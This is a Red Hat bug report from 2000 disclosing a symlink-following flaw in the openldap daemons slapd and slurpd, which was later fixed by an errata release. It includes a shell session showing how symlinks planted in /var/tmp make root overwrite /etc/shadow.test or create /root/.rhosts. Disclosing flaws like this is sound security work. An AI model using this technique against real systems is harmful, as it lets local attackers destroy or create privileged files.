10714 – Insecure file creation using static files which follow symlinks.

Bug 10714 - Insecure file creation using static files which follow symlinks.

Summary: Insecure file creation using static files which follow symlinks.

Keywords:
Status:	CLOSED ERRATA
Alias:	None
Product:	Red Hat Linux
Classification:	Retired
Component:	openldap
Sub Component:
Version:	6.2
Hardware:	All
OS:	Linux
Priority:	high
Severity:	medium
Target Milestone:	---
Assignee:	Nalin Dahyabhai
QA Contact:
Docs Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+	depends on / blocked

Reported:	2000-04-11 00:57 UTC by SB
Modified:	2008-05-01 15:37 UTC (History)
CC List:	1 user (show)
Fixed In Version:
Doc Type:	Bug Fix
Doc Text:
Clone Of:
Environment:
Last Closed:	2000-04-24 06:41:33 UTC
Embargoed:

Attachments	(Terms of Use)

Description SB 2000-04-11 00:57:44 UTC

I was trying out the new openldap package(openldap-1.2.9-5) and I noticed
it blindly creates some files which follow symlinks and will overwrite any
file without notification. For example:

[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# ln -s /etc/shadow.test /var/tmp/NEXTID
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:55 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
lrwxrwxrwx    1 root     root           13 Apr 10 20:55 NEXTID ->
/etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap start
Starting ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root          780 Apr 10 21:02 /etc/shadow.test
[root@king /]# /etc/rc.d/init.d/ldap stop
Shutting down ldap: [  OK  ]
[root@king /]# ls -al /etc/shadow.test
-r--------    1 root     root            2 Apr 10 21:04 /etc/shadow.test
[root@king /]#

Apparently when slapd terminates it creates the file NEXTID in /var/tmp
(actually it follows symlink from /usr/tmp).  It will create and
overwrite files.  slurpd has a similar problem:

[root@king /]# ls -al /root/.rhosts
ls: /root/.rhosts: No such file or directory
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /var/tmp
total 3
drwxrwxrwt    2 root     root         2048 Apr 10 20:59 .
drwxr-xr-x   21 root     root         1024 Apr  3 22:37 ..
-rw-r--r--    1 root     root            0 Apr 10 20:59 slurpd.status
[root@king /]#
[root@king /]# rm /var/tmp/slurpd.status
[root@king /]# ln -s /root/.rhosts /var/tmp/slurpd.status
[root@king /]# slurpd
No replicas in slapd config file "/etc/openldap/slapd.conf"!
Error: : directory does not exist
Error: /usr/tmp/slurpd.replog: directory does not exist
Error: /usr/tmp/slurpd.status: directory does not exist
[root@king /]# ls -al /root/.rhosts
-rw-r--r--    1 root     root            0 Apr 10 21:01 /root/.rhosts
[root@king /]#

slurpd to my knowledge will only create files, it will not overwrite or
truncate previously existing files.  Also after slapd is running if you
type slurpd, it will try to read from /var/tmp/slurpd.status fail and then
write to /var/tmp/slurpd.status.lock which can be a symlink to any file you
wish to create and truncate any existing file to 0 bytes.  There are other
instances I noticed in the code such /tmp/slurpd.dump and other files that
probably behanve the same. Not good.

-Stan Bubrouski

Comment 1 Cristian Gafton 2000-04-24 06:41:59 UTC

Errata released that fixes the problem.

Note You need to log in before you can comment on or make changes to this bug.